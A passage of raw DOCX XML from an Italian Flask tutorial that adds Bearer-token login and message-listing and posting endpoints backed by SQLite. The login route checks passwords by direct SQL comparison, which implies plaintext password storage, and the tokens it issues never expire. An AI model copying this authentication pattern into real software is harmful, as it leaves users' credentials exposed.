        <w:t xml:space="preserve">jsonify</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">di Flask (anche se Flask converte automaticamente i dizionari, useremo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">jsonify</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">esplicitamente quando vogliamo controllare lo status code).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Modifica la riga di import in cima al file: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redirect, render_template_string, session, jsonify</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">import</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> sqlite3</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">import</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> secrets</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">(Aggiunti:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">jsonify</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">e il modulo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">secrets</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">per generare token casuali.)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Aggiungi una nuova tabella per i token nelle inizializzazione del database. Modifica la funzione</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">init_db()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">aggiungendo questa esecuzione prima di</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">conn.commit()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    cur.execute(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"""</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        CREATE TABLE IF NOT EXISTS token_api (</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            token TEXT PRIMARY KEY,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            utente_id INTEGER NOT NULL,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            FOREIGN KEY (utente_id) REFERENCES utenti(id)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        )</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    """</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Adesso,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">prima</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">di</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">if __name__ == "__main__":</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, aggiungi:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># ════════════════════════════════════════════════════════════════════════</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># API REST</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># ════════════════════════════════════════════════════════════════════════</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">def</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> utente_da_token(header_authorization):</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"""Estrae l'utente_id a partire dall'header Authorization: Bearer &lt;token&gt;"""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header_authorization </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">or</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">not</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> header_authorization.startswith(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"Bearer "</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token </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> header_authorization.removeprefix(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"Bearer "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">).strip()</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utente_id FROM token_api WHERE token = ?"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, (token,))</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riga[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">] </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ControlFlowTok"/>
        </w:rPr>
        <w:t xml:space="preserve">if</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> riga </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ControlFlowTok"/>
        </w:rPr>
        <w:t xml:space="preserve">else</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VariableTok"/>
        </w:rPr>
        <w:t xml:space="preserve">None</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># ── POST /api/login ─────────────────────────────────────────────────────</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">@app.route</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"/api/login"</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api_login():</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    dati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dati </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">or</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"username"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dati </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">or</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"password"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dati:</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"username e password obbligatori"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">}), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">400</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id FROM utenti WHERE username=? AND password=?"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">                (dati[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"username"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">], dati[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"password"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">]))</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    riga </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> cur.fetchone()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"credenziali errate"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">}), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">401</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Genera un token casuale e lo salva</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    token </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> secrets.token_urlsafe(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">32</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    cur.execute(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"INSERT INTO token_api (token, utente_id) VALUES (?, ?)"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">                (token, riga[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">]))</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    conn.commit()</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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"token"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">: token, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"utente_id"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">: riga[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">]}), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">200</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># ── GET /api/messaggi ───────────────────────────────────────────────────</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">@app.route</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"/api/messaggi"</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api_messaggi_lista():</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SELECT messaggi.id, messaggi.testo, utenti.username</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        FROM messaggi JOIN utenti ON messaggi.utente_id = utenti.id</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        ORDER BY messaggi.id DESC</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    """</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    righe </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> cur.fetchall()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"messaggi"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">: [</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"id"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">: r[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">], </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"testo"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">: r[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">], </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"autore"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">: r[</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righe</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        ]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    })</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># ── POST /api/messaggi ──────────────────────────────────────────────────</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">@app.route</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"/api/messaggi"</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api_messaggi_crea():</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    utente_id </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> utente_da_token(request.headers.get(</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utente_id:</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"token mancante o invalido"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">}), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">401</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    dati </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> request.get_json(silent</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dati </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">or</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"testo"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dati </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">or</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">not</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> dati[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"testo"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">].strip():</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"campo 'testo' obbligatorio"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">}), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">400</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"INSERT INTO messaggi (utente_id, testo) VALUES (?, ?)"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">                (utente_id, dati[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"testo"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">].strip()))</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    nuovo_id </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> cur.lastrowid</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    conn.commit()</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    conn.close()</w:t>
      </w:r>
      <w:r>
        <w:br/>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nuovo_id, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"testo"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">: dati[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"testo"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">]}), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">201</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># ── GET /api/messaggi/&lt;id&gt; ──────────────────────────────────────────────</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">@app.route</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
